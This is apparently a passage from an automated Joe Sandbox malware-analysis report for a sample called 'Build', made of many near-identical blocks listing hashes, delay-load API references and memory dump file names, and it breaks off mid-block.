                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: bb4eb0b2a8e08eff93b8e582059aaa5f5cd8df14f0a971b2de5b46d36d638e40
                                                                                                    • Instruction ID: 4b6a77db8f2391f1734f2480ba1b4a13fc13bf62429f8b07cf799b8b97e13767
                                                                                                    • Opcode Fuzzy Hash: bb4eb0b2a8e08eff93b8e582059aaa5f5cd8df14f0a971b2de5b46d36d638e40
                                                                                                    • Instruction Fuzzy Hash: 11B012C139D200EC3104F189AC12D37015CC0C0B25730C93AF908C2181D4745C0C0332
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00940A5D
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 27b3bbb8eb6e469d2236e3d3d775713ec07afc9ec2a9bb2634a9944b6318141f
                                                                                                    • Instruction ID: 6bd428db59e388bbc462454ef173a035508222dc7ab7c79aacf1f8eb002dba73
                                                                                                    • Opcode Fuzzy Hash: 27b3bbb8eb6e469d2236e3d3d775713ec07afc9ec2a9bb2634a9944b6318141f
                                                                                                    • Instruction Fuzzy Hash: 31B012C17AC300EC3208B1D9DD2AE37018CD0C0B25330883BF908C11C0D4655C0F0331
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 0d19c7869272588b9797b330f8f66aed59618ea1fe2c0e8d758628fe3a45c843
                                                                                                    • Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
                                                                                                    • Opcode Fuzzy Hash: 0d19c7869272588b9797b330f8f66aed59618ea1fe2c0e8d758628fe3a45c843
                                                                                                    • Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: aa1aa236a6a424be86b9028e0723cca348ba629ce09f8f9441b45baa4239f280
                                                                                                    • Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
                                                                                                    • Opcode Fuzzy Hash: aa1aa236a6a424be86b9028e0723cca348ba629ce09f8f9441b45baa4239f280
                                                                                                    • Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 60d8cba07e444a1a1b9c88170c26a998dc2457bce96d8e36a0c154e99ac3172d
                                                                                                    • Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
                                                                                                    • Opcode Fuzzy Hash: 60d8cba07e444a1a1b9c88170c26a998dc2457bce96d8e36a0c154e99ac3172d
                                                                                                    • Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: ffd5b9f293e65f638b110c0e5bd8bb91a1ef9573bbeb6224473061518d6bc37d
                                                                                                    • Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
                                                                                                    • Opcode Fuzzy Hash: ffd5b9f293e65f638b110c0e5bd8bb91a1ef9573bbeb6224473061518d6bc37d
                                                                                                    • Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: e27cc26f5072eb97ddf6239be4ca725820369621740110b7ba38fbe781152a7e
                                                                                                    • Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
                                                                                                    • Opcode Fuzzy Hash: e27cc26f5072eb97ddf6239be4ca725820369621740110b7ba38fbe781152a7e
                                                                                                    • Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 9a440aac0dbd4ad609b68d85259f9a0333463514c4d4a3974a3808f6f3a58f54
                                                                                                    • Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
                                                                                                    • Opcode Fuzzy Hash: 9a440aac0dbd4ad609b68d85259f9a0333463514c4d4a3974a3808f6f3a58f54
                                                                                                    • Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 092feb9a79fc9973bea137dad452ad2e598d3f0729e3e0e7f19d58695d139749
                                                                                                    • Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
                                                                                                    • Opcode Fuzzy Hash: 092feb9a79fc9973bea137dad452ad2e598d3f0729e3e0e7f19d58695d139749
                                                                                                    • Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: 7a72ed6abdb87342895d59cd4f9ae53fa81b991c4dcba71ad81b5d6dce826023
                                                                                                    • Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
                                                                                                    • Opcode Fuzzy Hash: 7a72ed6abdb87342895d59cd4f9ae53fa81b991c4dcba71ad81b5d6dce826023
                                                                                                    • Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: ed2669d1d240e0221e58827bdf61d18b122ff60169646509d8e647f6d03a7858
                                                                                                    • Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
                                                                                                    • Opcode Fuzzy Hash: ed2669d1d240e0221e58827bdf61d18b122ff60169646509d8e647f6d03a7858
                                                                                                    • Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0094068E
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: d46fa787fbf82d3472f1bbd39ea2a673a33ad39a784b44d5a96cc813fbfed326
                                                                                                    • Instruction ID: a680a10aaa4714b78df9be1567f02ebde83cdfc14861fe4368b4cdbf0ec97291
                                                                                                    • Opcode Fuzzy Hash: d46fa787fbf82d3472f1bbd39ea2a673a33ad39a784b44d5a96cc813fbfed326
                                                                                                    • Instruction Fuzzy Hash: A9A00296659543BC351561555D17D3F011CD4C4B693318D29F506C5081646418595131
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009408A7
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: e45bc06376e128249a96211cfc54d46a99e8abb181d47f715a925734fb777541
                                                                                                    • Instruction ID: 3761872d18dce81406adeb2fe89629c600282cd73b0a41141a110fdf639592bb
                                                                                                    • Opcode Fuzzy Hash: e45bc06376e128249a96211cfc54d46a99e8abb181d47f715a925734fb777541
                                                                                                    • Instruction Fuzzy Hash: 17A002966552117C310971555D16D3E121CD4C0B25330896DF609D5186746518495171
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009408A7
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: f93e5e16c3e38753e55795e7286fda4006f34845595cb36c881317c3e18cdeaa
                                                                                                    • Instruction ID: 9acf61e7d5826110b379920cedb11079a9abb514ab87a36a58e906b30c941932
                                                                                                    • Opcode Fuzzy Hash: f93e5e16c3e38753e55795e7286fda4006f34845595cb36c881317c3e18cdeaa
                                                                                                    • Instruction Fuzzy Hash: 2DA00296659111BC310971555D16D3E121CD4C4B653308D1DF605C5182746518495171
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 009408A7
                                                                                                      • Part of subcall function 00940D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00940DAD
                                                                                                      • Part of subcall function 00940D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00940DBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-0
                                                                                                    • Opcode ID: d4e5989958f971c78133224c3cb9b8bc583ebbfd78e1a22d76aa3c8f9c5b242b
